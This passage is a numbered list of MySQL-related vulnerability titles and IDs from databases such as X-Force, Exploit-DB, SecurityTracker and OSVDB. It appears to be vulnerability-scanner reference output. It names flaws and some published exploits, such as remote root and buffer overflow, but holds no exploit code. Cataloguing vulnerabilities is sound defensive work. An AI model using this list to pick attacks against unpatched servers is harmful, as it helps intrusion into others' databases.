10861| [72520] Oracle MySQL Server denial of service
10862| [72519] Oracle MySQL Server denial of service
10863| [72518] Oracle MySQL Server unspecified
10864| [72517] Oracle MySQL Server unspecified
10865| [72516] Oracle MySQL Server unspecified
10866| [72515] Oracle MySQL Server denial of service
10867| [72514] Oracle MySQL Server unspecified
10868| [71965] MySQL port denial of service
10869| [70680] DBD::mysqlPP unspecified SQL injection
10870| [70370] TaskFreak! multi-mysql unspecified path disclosure
10871| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
10872| [68294] MySQLDriverCS statement.cs sql injection
10873| [68175] Prosody MySQL denial of service
10874| [67539] Zend Framework MySQL PDO security bypass
10875| [67254] DirectAdmin MySQL information disclosure
10876| [66567] Xoops mysql.sql information disclosure
10877| [65871] PyWebDAV MySQLAuthHandler class SQL injection
10878| [65543] MySQL Select Arbitrary data into a File
10879| [65529] MySQL Eventum full_name field cross-site scripting
10880| [65380] Oracle MySQL Eventum forgot_password.php cross-site scripting
10881| [65379] Oracle MySQL Eventum list.php cross-site scripting
10882| [65266] Accellion File Transfer Appliance MySQL default password
10883| [64878] MySQL Geometry denial of service
10884| [64877] MySQL EXPLAIN EXTENDED denial of service
10885| [64876] MySQL prepared statement denial of service
10886| [64845] MySQL extreme-value denial of service
10887| [64844] MySQL Gis_line_string::init_from_wkb denial of service
10888| [64843] MySQL user-variable denial of service
10889| [64842] MySQL view preparation denial of service
10890| [64841] MySQL prepared statement denial of service
10891| [64840] MySQL LONGBLOB denial of service
10892| [64839] MySQL invocations denial of service
10893| [64838] MySQL Gis_line_string::init_from_wkb denial of service
10894| [64689] MySQL dict0crea.c denial of service
10895| [64688] MySQL SET column denial of service
10896| [64687] MySQL BINLOG command denial of service
10897| [64686] MySQL InnoDB denial of service
10898| [64685] MySQL HANDLER interface denial of service
10899| [64684] MySQL Item_singlerow_subselect::store denial of service
10900| [64683] MySQL OK packet denial of service
10901| [63518] MySQL Query Browser GUI Tools information disclosure
10902| [63517] MySQL Administrator GUI Tools information disclosure
10903| [62272] MySQL PolyFromWKB() denial of service
10904| [62269] MySQL LIKE predicates denial of service
10905| [62268] MySQL joins denial of service
10906| [62267] MySQL GREATEST() or LEAST() denial of service
10907| [62266] MySQL GROUP_CONCAT() denial of service
10908| [62265] MySQL expression values denial of service
10909| [62264] MySQL temporary table denial of service
10910| [62263] MySQL LEAST() or GREATEST() denial of service
10911| [62262] MySQL replication privilege escalation
10912| [61739] MySQL WITH ROLLUP denial of service
10913| [61343] MySQL LOAD DATA INFILE denial of service
10914| [61342] MySQL EXPLAIN denial of service
10915| [61341] MySQL HANDLER denial of service
10916| [61340] MySQL BINLOG denial of service
10917| [61339] MySQL IN() or CASE denial of service
10918| [61338] MySQL SET denial of service
10919| [61337] MySQL DDL denial of service
10920| [61318] PHP mysqlnd_wireprotocol.c buffer overflow
10921| [61317] PHP php_mysqlnd_read_error_from_line buffer overflow
10922| [61316] PHP php_mysqlnd_auth_write buffer overflow
10923| [61274] MySQL TEMPORARY InnoDB denial of service
10924| [59905] MySQL ALTER DATABASE denial of service
10925| [59841] CMySQLite updateUser.php cross-site request forgery
10926| [59112] MySQL Enterprise Monitor unspecified cross-site request forgery
10927| [59075] PHP php_mysqlnd_auth_write() buffer overflow
10928| [59074] PHP php_mysqlnd_read_error_from_line() buffer overflow
10929| [59073] PHP php_mysqlnd_rset_header_read() buffer overflow
10930| [59072] PHP php_mysqlnd_ok_read() information disclosure
10931| [58842] MySQL DROP TABLE file deletion
10932| [58676] Template Shares MySQL information disclosure
10933| [58531] MySQL COM_FIELD_LIST buffer overflow
10934| [58530] MySQL packet denial of service
10935| [58529] MySQL COM_FIELD_LIST security bypass
10936| [58311] ClanSphere the captcha generator and MySQL driver SQL injection
10937| [57925] MySQL UNINSTALL PLUGIN security bypass
10938| [57006] Quicksilver Forums mysqldump information disclosure
10939| [56800] Employee Timeclock Software mysqldump information disclosure
10940| [56200] Flex MySQL Connector ActionScript SQL injection
10941| [55877] MySQL yaSSL buffer overflow
10942| [55622] kiddog_mysqldumper extension for TYPO3 information disclosure
10943| [55416] MySQL unspecified buffer overflow
10944| [55382] Ublog UblogMySQL.sql information disclosure
10945| [55251] PHP-MySQL-Quiz editquiz.php SQL injection
10946| [54597] MySQL sql_table.cc security bypass
10947| [54596] MySQL mysqld denial of service
10948| [54365] MySQL OpenSSL security bypass
10949| [54364] MySQL MyISAM table symlink
10950| [53950] The mysql-ocaml mysql_real_escape_string weak security
10951| [52978] Zmanda Recovery Manager for MySQL mysqlhotcopy privilege escalation
10952| [52977] Zmanda Recovery Manager for MySQL socket-server.pl command execution
10953| [52660] iScouter PHP Web Portal MySQL Password Retrieval
10954| [52220] aa33code mysql.inc information disclosure
10955| [52122] MySQL Connector/J unicode SQL injection
10956| [51614] MySQL dispatch_command() denial of service
10957| [51406] MySQL Connector/NET SSL spoofing
10958| [49202] MySQL UDF command execution
10959| [49050] MySQL XPath denial of service
10960| [48919] Cisco Application Networking Manager MySQL default account password
10961| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
10962| [47544] MySQL Calendar index.php SQL injection
10963| [47476] MySQL Calendar index.php nodstrumCalendarV2 security bypass
10964| [45649] MySQL MyISAM symlink security bypass
10965| [45648] MySQL MyISAM symlinks security bypass
10966| [45607] MySQL Quick Admin actions.php file include
10967| [45606] MySQL Quick Admin index.php file include
10968| [45590] MySQL command-line client cross-site scripting
10969| [45436] PromoteWeb MySQL go.php SQL injection
10970| [45042] MySQL empty bit-string literal denial of service
10971| [44662] mysql-lists unspecified cross-site scripting
10972| [42267] MySQL MyISAM security bypass
10973| [42211] GEDCOM_to_MySQL2 index.php, info.php and prenom.php cross-site scripting
10974| [42014] miniBB setup_mysql.php and setup_options.php SQL injection
10975| [40920] MySQL sql_select.cc denial of service
10976| [40734] MySQL Server BINLOG privilege escalation
10977| [40350] MySQL password information disclosure
10978| [39415] Debian GNU/Linux libdspam7-drv-mysql cron job password disclosure
10979| [39402] PHP LOCAL INFILE and MySQL extension security bypass
10980| [38999] aurora framework db_mysql.lib SQL injection
10981| [38990] MySQL federated engine denial of service
10982| [38989] MySQL DEFINER value privilege escalation
10983| [38988] MySQL DATA DIRECTORY and INDEX DIRECTORY privilege escalation
10984| [38964] MySQL RENAME TABLE symlink
10985| [38733] ManageEngine EventLog Analyzer MySQL default password
10986| [38284] MySQL ha_innodb.cc convert_search_mode_to_innobase() denial of service
10987| [38189] MySQL default root password
10988| [37235] Asterisk-Addons cdr_addon_mysql module SQL injection
10989| [37099] RHSA update for MySQL case sensistive database name privilege escalation not installed
10990| [36555] PHP MySQL extension multiple functions security bypass
10991| [35960] MySQL view privilege escalation
10992| [35959] MySQL CREATE TABLE LIKE information disclosure
10993| [35958] MySQL connection protocol denial of service
10994| [35291] MySQLDumper main.php security bypass
10995| [34811] MySQL udf_init and mysql_create_function command execution
10996| [34809] MySQL mysql_update privilege escalation
10997| [34349] MySQL ALTER information disclosure
10998| [34348] MySQL mysql_change_db privilege escalation
10999| [34347] MySQL RENAME TABLE weak security
11000| [34232] MySQL IF clause denial of service
11001| [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
11002| [33285] Eve-Nuke mysql.php file include
11003| [32957] MySQL Commander dbopen.php file include
11004| [32933] cPanel load_language.php and mysqlconfig.php file include
11005| [32911] MySQL filesort function denial of service
11006| [32462] cPanel passwdmysql cross-site scripting
11007| [32288] RHSA-2006:0544 updates for mysql not installed
11008| [32266] MySQLNewsEngine affichearticles.php3 file include
11009| [31244] The Address Book MySQL export.php password information disclosure
11010| [31037] Php/Mysql Site Builder (PHPBuilder) htm2php.php directory traversal
11011| [30760] BTSaveMySql URL file disclosure
11012| [30191] StoryStream mysql.php and mysqli.php file include
11013| [30085] MySQL MS-DOS device name denial of service
11014| [30031] Agora MysqlfinderAdmin.php file include
11015| [29438] MySQLDumper mysqldumper_path/sql.php cross-site scripting
11016| [29179] paBugs class.mysql.php file include
11017| [29120] ZoomStats MySQL file include
11018| [28448] MySQL case sensitive database name privilege escalation
11019| [28442] MySQL GRANT EXECUTE privilege escalation
11020| [28387] FunkBoard admin/mysql_install.php and admin/pg_install.php unauthorized access
11021| [28202] MySQL multiupdate subselect query denial of service
11022| [28180] MySQL MERGE table security bypass
11023| [28176] PHP MySQL Banner Exchange lib.inc information disclosure
11024| [27995] Opsware Network Automation System MySQL plaintext password
11025| [27904] MySQL date_format() format string
11026| [27635] MySQL Instance Manager denial of service
11027| [27212] MySQL SELECT str_to_date denial of service
11028| [26875] MySQL ASCII escaping SQL injection
11029| [26420] Apple Mac OS X MySQL Manager blank password
11030| [26236] MySQL login packet information disclosure
11031| [26232] MySQL COM_TABLE_DUMP buffer overflow
11032| [26228] MySQL sql_parce.cc information disclosure
11033| [26042] MySQL running
11034| [25313] WoltLab Burning Board class_db_mysql.php cross-site scripting
11035| [24966] MySQL mysql_real_query logging bypass
11036| [24653] PAM-MySQL logging function denial of service
11037| [24652] PAM-MySQL authentication double free code execution
11038| [24567] PHP/MYSQL Timesheet index.php and changehrs.php SQL injection
11039| [24095] PHP ext/mysqli exception handling format string
11040| [23990] PHP mysql_connect() buffer overflow
11041| [23596] MySQL Auction search module could allow cross-site scripting
11042| [22642] RHSA-2005:334 updates for mysql not installed
11043| [21757] MySQL UDF library functions command execution
11044| [21756] MySQL LoadLibraryEx function denial of service
11045| [21738] MySQL UDF mysql_create_function function directory traversal
11046| [21737] MySQL user defined function buffer overflow
11047| [21640] MySQL Eventum multiple class SQL injection
11048| [21638] MySQL Eventum multiple scripts cross-site scripting
11049| [20984] xmysqladmin temporary file symlink
11050| [20656] MySQL mysql_install_db script symlink
11051| [20333] Plans MySQL password information disclosure
11052| [19659] MySQL CREATE TEMPORARY TABLE command creates insecure files
11053| [19658] MySQL udf_init function gain access
11054| [19576] auraCMS mysql_fetch_row function path disclosure
11055| [18922] MySQL mysqlaccess script symlink attack
11056| [18824] MySQL UDF root privileges
11057| [18464] mysql_auth unspecified vulnerability
11058| [18449] Sugar Sales plaintext MySQL password
11059| [17783] MySQL underscore allows elevated privileges
11060| [17768] MySQL MATCH ... AGAINST SQL statement denial of service
11061| [17667] MySQL UNION change denial of service
11062| [17666] MySQL ALTER TABLE RENAME bypass restriction
11063| [17493] MySQL libmysqlclient bulk inserts buffer overflow
11064| [17462] MySQLGuest AWSguest.php script cross-site scripting
11065| [17047] MySQL mysql_real_connect buffer overflow
11066| [17030] MySQL mysqlhotcopy insecure temporary file
11067| [16612] MySQL my_rnd buffer overflow
11068| [16604] MySQL check_scramble_323 function allows unauthorized access
11069| [15883] MySQL mysqld_multi script symlink attack
11070| [15617] MySQL mysqlbug script symlink attack
11071| [15417] Confixx db_mysql_loeschen2.php SQL injection
11072| [15280] Proofpoint Protection Server MySQL allows unauthorized access
11073| [13404] HP Servicecontrol Manager multiple vulnerabilities in MySQL could allow execution of code
11074| [13153] MySQL long password buffer overflow
11075| [12689] MySQL AB ODBC Driver stores ODBC passwords and usernames in plain text
11076| [12540] Teapop PostSQL and MySQL modules SQL injection
11077| [12337] MySQL mysql_real_connect function buffer overflow
11078| [11510] MySQL datadir/my.cnf modification could allow root privileges
11079| [11493] mysqlcc configuration and connection files are world writable
11080| [11340] SuckBot mod_mysql_logger denial of service
11081| [11199] MySQL mysql_change_user() double-free memory pointer denial of service
11082| [10850] MySQL libmysql client read_one_row buffer overflow
11083| [10849] MySQL libmysql client read_rows buffer overflow
11084| [10848] MySQL COM_CHANGE_USER password buffer overflow
11085| [10847] MySQL COM_CHANGE_USER command password authentication bypass
11086| [10846] MySQL COM_TABLE_DUMP unsigned integer denial of service
11087| [10483] Bugzilla stores passwords in plain text in the MySQL database
11088| [10455] gBook MySQL could allow administrative access
11089| [10243] MySQL my.ini "
11090| [9996] MySQL SHOW GRANTS command discloses adminstrator`s encrypted password
11091| [9909] MySQL logging disabled by default on Windows
11092| [9908] MySQL binding to the loopback adapter is disabled
11093| [9902] MySQL default root password could allow unauthorized access
11094| [8748] Cyrus SASL LDAP+MySQL patch allows user unauthorized POP access
11095| [8105] PHP MySQL client library allows an attacker to bypass safe_mode restrictions
11096| [7923] Conectiva Linux MySQL /var/log/mysql file has insecure permissions
11097| [7206] WinMySQLadmin stores MySQL password in plain text
11098| [6617] MySQL "
11099| [6419] MySQL drop database command buffer overflow
11100| [6418] MySQL libmysqlclient.so buffer overflow
11101| [5969] MySQL select buffer overflow
11102| [5447] pam_mysql authentication input
11103| [5409] MySQL authentication algorithm obtain password hash
11104| [5057] PCCS MySQL Database Admin Tool could reveal username and password
11105| [4228] MySQL unauthenticated remote access
11106| [3849] MySQL default test account could allow any user to connect to the database
11107| [1568] MySQL creates readable log files
11108|
11109| Exploit-DB - https://www.exploit-db.com:
11110| [30744] MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
11111| [30020] MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability
11112| [29724] MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability
11113| [27326] MySQL 5.0.18 Query Logging Bypass Vulnerability
11114| [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
11115| [20044] Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
11116| [18269] MySQL 5.5.8 - Remote Denial of Service (DOS)
11117| [15467] Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability
11118| [9085] MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)
11119| [4615] MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability
11120| [4392] PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
11121| [1742] MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit
11122| [1741] MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit
11123|
11124| OpenVAS (Nessus) - http://www.openvas.org:
11125| [53251] Debian Security Advisory DSA 562-1 (mysql)
11126| [53230] Debian Security Advisory DSA 540-1 (mysql)
11127|
11128| SecurityTracker - https://www.securitytracker.com:
11129| [1028790] MySQL Multiple Bugs Let Remote Users Deny Service and Partially Access and Modify Data
11130| [1028449] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service and Partially Access and Modify Data
11131| [1028004] MySQL Multiple Bugs Let Remote Authenticated Users Take Full Control or Deny Service and Let Local Users Access and Modify Data
11132| [1027829] MySQL Bug in UpdateXML() Lets Remote Authenticated Users Deny Service
11133| [1027828] MySQL Heap Overflow May Let Remote Authenticated Users Execute Arbitrary Code
11134| [1027827] MySQL Stack Overflow May Let Remote Authenticated Users Execute Arbitrary Code
11135| [1027665] MySQL Multiple Bugs Let Remote Authenticated Users Access and Modify Data and Deny Service and Local Users Access Data
11136| [1027263] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service
11137| [1027143] MySQL memcmp() Comparison Error Lets Remote Users Bypass Authentication
11138| [1026934] MySQL Multiple Bugs Let Remote Users Deny Service
11139| [1026896] MySQL Unspecified Flaws Have Unspecified Impact
11140| [1026659] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
11141| [1026530] MySQL Multiple Bugs Let Local and Remote Users Partially Access and Modifiy Data and Partially Deny Service
11142| [1024508] MySQL Replication Flaw Lets Remote Authenticated Users Gain Elevated Privileges
11143| [1024507] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
11144| [1024360] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
11145| [1024160] MySQL ALTER DATABASE Processing Error Lets Remote Authenticated Users Deny Service
11146| [1024033] MySQL COM_FIELD_LIST Packet Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
11147| [1024032] MySQL Large Packet Processing Flaw in my_net_skip_rest() Lets Remote Users Deny Service
11148| [1024031] MySQL COM_FIELD_LIST Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
11149| [1024004] MySQL mi_delete_table() Symlink Flaw Lets Remote Authenticated Users Delete Data and Index Files
11150| [1023402] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
11151| [1023220] MySQL Client Fails to Check Server Certificates in Certain Cases
11152| [1022812] MySQL Unspecified Buffer Overflow Lets Remote Users Execute Arbitrary Code
11153| [1022533] MySQL Format String Bug in dispatch_command() Lets Remote Users Deny Service
11154| [1022482] MySQL Connector/Net is Missing SSL Certificate Validation
11155| [1021786] MySQL Bug in ExtractValue()/UpdateXML() in Processing XPath Expressions Lets Remote Authenticated Users Deny Service
11156| [1021714] (Red Hat Issues Fix) mod_auth_mysql Input Validation Flaw Lets Remote Users Inject SQL Commands
11157| [1020858] MySQL Item_bin_string::Item_bin_string() Binary Value Processing Bug Lets Remote Authenticated Users Deny Service
11158| [1019995] MySQL MyISAM Options Let Local Users Overwrite Table Files
11159| [1019085] MySQL Bugs Let Remote Authenticated Users Gain Elevated Privileges and Deny Service
11160| [1019084] MySQL DATA DIRECTORY and INDEX DIRECTORY Options May Let Remote Authenticated Users Gain Elevated Privileges
11161| [1019083] MySQL BINLOG Filename Path Bug May Let Remote Authenticated Users Gain Elevated Privileges
11162| [1019060] MySQL Rename Table Bug Lets Remote Authenticated Users Modify System Table Information
11163| [1018978] MySQL convert_search_mode_to_innobase() Bug Lets Remote Authenticated Users Deny Service
11164| [1018824] Asterisk-Addons Input Validation Flaw in cdr_addon_mysql Lets Remote Users Inject SQL Commands
11165| [1018663] MySQL Table View Access Bug Lets Remote Authenticated Users Gain Elevated Privileges
11166| [1018629] MySQL Authentication Protocol Bug Lets Remote Users Deny Service
11167| [1018071] MySQL ALTER TABLE Function Lets Remote Authenticated Users Obtain Potentially Sensitive Information
11168| [1018070] MySQL SQL SECURITY INVOKER Routines Let Remote Authenticated Users Gain Elevated Privileges
11169| [1018069] MySQL Lets Remote Authenticated Users Issue the RENAME TABLE Command
11170| [1017746] MySQL Single Row Subselect Statements Let Remote Users Deny Service
11171| [1016790] MySQL Replication Error Lets Local Users Deny Service
11172| [1016710] MySQL Case-Sensitive Database Names May Let Users Access Restricted Databases
11173| [1016709] MySQL Error in Checking suid Routine Arguments May Let Users Gain Elevated Privileges
11174| [1016617] MySQL MERGE Access Control Error May Let Users Access a Restricted Table
11175| [1016566] Opsware Network Automation System Discloses MySQL Password to Local Users
11176| [1016216] MySQL Error in Parsing Multibyte Encoded Data in mysql_real_escape() Lets Remote Users Inject SQL Commands
11177| [1016077] Apple MySQL Manager Database Initialization Bug May Let Local Users Access the Database
11178| [1016017] MySQL Anonymous Login Processing May Disclose Some Memory Contents to Remote Users
11179| [1016016] MySQL COM_TABLE_DUMP Processing Lets Remote Authenticated Users Execute Arbitrary Code or Obtain Information
11180| [1015789] Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
11181| [1015693] MySQL Query Bug Lets Remote Users Bypass Query Logging
11182| [1015603] PAM-MySQL pam_get_item() Double Free May Let Remote Users Execute Arbitrary Code
11183| [1015485] PHP mysqli Extension Error Mode Format String Flaw May Let Users Execute Arbitrary Code
11184| [1014603] MySQL Eventum Input Validation Hole in 'class.auth.php' Permits SQL Injection and Other Input Validation Bugs Permit Cross-Site Scripting Attacks
11185| [1014172] xMySQLadmin Lets Local Users Delete Files
11186| [1013995] MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
11187| [1013994] MySQL Non-existent '--user' Error May Allow the Database to Run With Incorrect Privileges
11188| [1013415] MySQL CREATE FUNCTION Lets Authenticated Users Invoke libc Functions to Execute Arbitrary Code
11189| [1013414] MySQL udf_init() Path Validation Flaw Lets Authenticated Users Execute Arbitrary Libraries
11190| [1013413] MySQL CREATE TEMPORARY TABLE Uses Predictable Temporary Files That May Let Users Gain Elevated Privileges
11191| [1012914] MySQL 'mysqlaccess.sh' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
11192| [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
11193| [1012500] mysql_auth Memory Leak Has Unspecified Impact
11194| [1011741] MySQL Access Control Error in Databases With Underscore Wildcard Character May Grant Unauthorized Access
11195| [1011606] MySQL May Let Remote Authenticated Users Access Restricted Tables or Crash the System
11196| [1011408] MySQL libmysqlclient Buffer Overflow in Executing Prepared Statements Has Unspecified Impact
11197| [1011376] MySQLGuest Lack of Input Validation Lets Remote Users Conduct Cross-Site Scripting Attacks
11198| [1011008] MySQL Buffer Overflow in mysql_real_connect() May Let Remote Users Execute Arbitrary Code
11199| [1010979] MySQL 'mysqlhotcopy' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
11200| [1010645] MySQL check_scramble_323() Zero-Length Comparison Lets Remote Users Bypass Authentication
11201| [1009784] MySQL 'mysqld_multi' Temporary File Flaw Lets Local Users Overwrite Files
11202| [1009554] MySQL 'mysqlbug' Temporary File Flaw Lets Local Users Overwrite Files
11203| [1007979] MySQL mysql_change_user() Double Free Error Lets Remote Authenticated Users Crash mysqld
11204| [1007673] MySQL acl_init() Buffer Overflow Permits Remote Authenticated Administrators to Execute Arbitrary Code
11205| [1007518] DWebPro Discloses MySQL Database Password to Local Users
11206| [1007312] MySQL World-Writable Configuration File May Let Local Users Gain Root Privileges
11207| [1006976] MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
11208| [1005800] MySQL Overflow and Authentication Bugs May Let Remote Users Execute Code or Access Database Accounts
11209| [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT
11210| [1004506] vBulletin PHP-based Forum Software Has Unspecified Security Flaw in the 'db_mysql.php' Module
11211| [1004172] PHP-Survey Script Discloses Underlying MySQL Database Username and Password to Remote Users
11212| [1003955] 3rd Party Patch for Cyrus SASL ('auxprop for mysql and ldap') Lets Remote Users Access Protected POP Mail Accounts Without Authentication
11213| [1003290] Conectiva Linux MySQL Distribution May Allow Local Users to Obtain Sensitive Information
11214| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
11215| [1002485] WinMySQLadmin Database Administration Tool Discloses MySQL Password to Local Users
11216| [1002324] Vpopmail Mail Server Discloses Database Password to Local Users When Installed with MySQL
11217| [1001411] phpMyAdmin Administration Tool for MySQL Allows Remote Users to Execute Commands on the Server
11218| [1001118] MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
11219|
11220| OSVDB - http://www.osvdb.org:
11221| [95337] Oracle MySQL Server XA Transactions Subcomponent Unspecified Remote DoS
11222| [95336] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
11223| [95335] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11224| [95334] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue
11225| [95333] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
11226| [95332] Oracle MySQL Server Parser Subcomponent Unspecified Remote DoS
11227| [95331] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3801)
11228| [95330] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3808)
11229| [95329] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3796)
11230| [95328] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3804)
11231| [95327] Oracle MySQL Server Prepared Statements Subcomponent Unspecified Remote DoS
11232| [95326] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11233| [95325] Oracle MySQL Server Full Text Search Subcomponent Unspecified Remote DoS
11234| [95324] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3795)
11235| [95323] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3793)
11236| [95322] Oracle MySQL Server Audit Log Subcomponent Unspecified Remote Issue
11237| [95321] Oracle MySQL Server MemCached Subcomponent Unspecified Remote Issue
11238| [95131] AutoMySQLBackup /usr/sbin/automysqlbackup Database Name Arbitrary Code Injection
11239| [94076] Debian Linux MySQL Server mysql-server-5.5.postinst Race Condition debian.cnf Plaintext Credential Local Disclosure
11240| [93505] Wireshark MySQL Dissector (packet-mysql.c) Malformed Packet Handling Infinite Loop Remote DoS
11241| [93174] MySQL Crafted Derived Table Handling DoS
11242| [92967] MySQL2JSON (mn_mysql2json) Extension for TYPO3 Unspecified SQL Injection
11243| [92950] MySQL Running START SLAVE Statement Process Listing Plaintext Local Password Disclosure
11244| [92485] Oracle MySQL Server Partition Subcomponent Unspecified Local DoS
11245| [92484] Oracle MySQL Server Locking Subcomponent Unspecified Remote DoS (2013-1506)
11246| [92483] Oracle MySQL Server Install Subcomponent Unspecified Local Issue
11247| [92482] Oracle MySQL Server Types Subcomponent Unspecified Remote DoS
11248| [92481] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2381)
11249| [92480] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1566)
11250| [92479] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1511)
11251| [92478] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1567)
11252| [92477] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
11253| [92476] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
11254| [92475] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
11255| [92474] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS
11256| [92473] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-2389)
11257| [92472] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
11258| [92471] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1512)
11259| [92470] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1544)
11260| [92469] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote Issue
11261| [92468] Oracle MySQL Server MemCached Subcomponent Unspecified Remote DoS
11262| [92467] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2375)
11263| [92466] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-1531)
11264| [92465] Oracle MySQL Server Server Subcomponent Unspecified Remote Issue
11265| [92464] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Issue
11266| [92463] Oracle MySQL Server Locking Subcomponent Unspecified Remote Issue (2013-1521)
11267| [92462] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-2395)
11268| [91536] Oracle MySQL yaSSL Unspecified Overflow (2012-0553)
11269| [91534] Oracle MySQL yaSSL Unspecified Overflow (2013-1492)
11270| [91415] MySQL Raw Geometry Object String Conversion Remote DoS
11271| [91108] Juju mysql Charm Install Script mysql.passwd MySQL Password Plaintext Local Disclosure
11272| [89970] Site Go /site-go/admin/extra/mysql/index.php idm Parameter Traversal Arbitrary File Access
11273| [89265] Oracle MySQL Server Server Privileges Subcomponent Unspecified Remote DoS
11274| [89264] Oracle MySQL Server Server Partition Subcomponent Unspecified Remote DoS
11275| [89263] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-0578)
11276| [89262] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-1705)
11277| [89261] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-0574)
11278| [89260] Oracle MySQL Server MyISAM Subcomponent Unspecified Remote DoS
11279| [89259] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2012-0572)
11280| [89258] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-0368)
11281| [89257] Oracle MySQL Server Server Locking Subcomponent Unspecified Remote DoS
11282| [89256] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-1702)
11283| [89255] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote Issue
11284| [89254] Oracle MySQL Server Server Replication Subcomponent Unspecified Local Issue
11285| [89253] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
11286| [89252] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS
11287| [89251] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
11288| [89250] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
11289| [89042] ViciBox Server MySQL cron Service Default Credentials
11290| [88415] Oracle MySQL Server COM_CHANGE_USER Account Password Brute-Force Weakness
11291| [88118] Oracle MySQL Server FILE Privilege Database Privilege Escalation
11292| [88067] Oracle MySQL Server Authentication Error Message User Enumeration
11293| [88066] Oracle MySQL Server for Linux Access Rights Checking Routine Database Name Handling Stack Buffer Overflow
11294| [88065] Oracle MySQL Server COM_BINLOG_DUMP Invalid Data Handling DoS
11295| [88064] Oracle MySQL Server Multiple-Table DELETE Heap Buffer Overflow
11296| [87704] CodeIgniter MySQL / MySQLi Driver Database Client Multi-byte Character Set Unspecified SQL Injection
11297| [87507] Oracle MySQL Statement Logging Multiple Log Plaintext Local Password Disclosure
11298| [87501] Oracle MySQL optimizer_switch Malformed Value Processing Local DoS
11299| [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS
11300| [87480] MySQL Malformed XML Comment Handling DoS
11301| [87466] MySQL SSL Certificate Revocation Weakness
11302| [87356] Oracle MySQL do_div_mod DIV Expression Handling Remote DoS
11303| [87355] Oracle MySQL handler::pushed_cond Table Cache Handling mysqld DoS
11304| [87354] Oracle MySQL Polygon Union / Intersection Spatial Operations DoS
11305| [86273] Oracle MySQL Server Server Installation Subcomponent Unspecified Local Information Disclosure
11306| [86272] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote DoS
